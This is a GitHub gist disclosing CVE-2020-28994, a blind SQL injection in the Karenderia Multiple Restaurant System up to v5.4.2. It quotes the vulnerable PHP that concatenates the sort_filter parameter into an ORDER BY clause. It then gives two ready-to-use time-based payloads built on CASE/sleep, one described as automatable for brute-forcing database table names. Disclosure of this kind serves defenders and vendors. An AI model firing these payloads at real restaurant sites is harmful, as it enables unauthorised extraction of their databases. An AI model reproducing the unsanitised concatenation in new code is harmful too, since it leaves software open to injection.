Skip to content

Instantly share code, notes, and snippets.

@wes4m

wes4m/Karenderia Multiple Restaurant System v5.4.2 SQLi.md

Last active November 24, 2020 02:18
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save wes4m/e32080b02c2cd668d50eeac66613ca1d to your computer and use it in GitHub Desktop.
Save wes4m/e32080b02c2cd668d50eeac66613ca1d to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Karenderia Multiple Restaurant System v5.4.2 SQLi.md

Karenderia Multiple Restaurant System <=5.4.2 - SQLi Vuln.

CVE: CVE-2020-28994

Date: 21-11-2020

Exploit Author: wes4m

Vendor Homepage: buyer2@codemywebapps.com

Software Link:

https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694

Version: v5.4.2

Category: Web applicaiton.

Software Description:

The true and only #1 multiple restaurant in codecanyon Karenderia Multiple Restaurant System is a restaurant food ordering and restaurant membership system.

Affected function:

FunctionsV3::searchByMerchant

Injection point:

  $sort_by =" ORDER BY is_sponsored DESC, restaurant_name ASC";		
		$sort_combine=$sort_by;
				
		if (isset($getdata['sort_filter'])){
			if (!empty($getdata['sort_filter'])){
				$sort="ASC";
				if($getdata['sort_filter']=="ratings"){
					$sort="DESC";
				}
				$sort_combine=" ORDER BY ".$getdata['sort_filter']." $sort";
			}
		}

Vuln info

Blind SQL Injection in all end points that allow sorting through sort_filter parameter.

PoC:

searcharea?s=x&sort_filter=(CASE WHEN(SELECT count(*) FROM information_schema.tables WHERE table_name = 'COLUMNS')=1 THEN sleep(10) ELSE sleep(1) END)--&display_type=listview

Example leaking payload that can be automated:

searcharea?s=x&sort_filter=(CASE WHEN(SELECT count(*) FROM information_schema.tables WHERE table_name LIKE 'BRUTE_FORCE%')=1 THEN sleep(10) ELSE sleep(1) END)--&display_type=listview
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment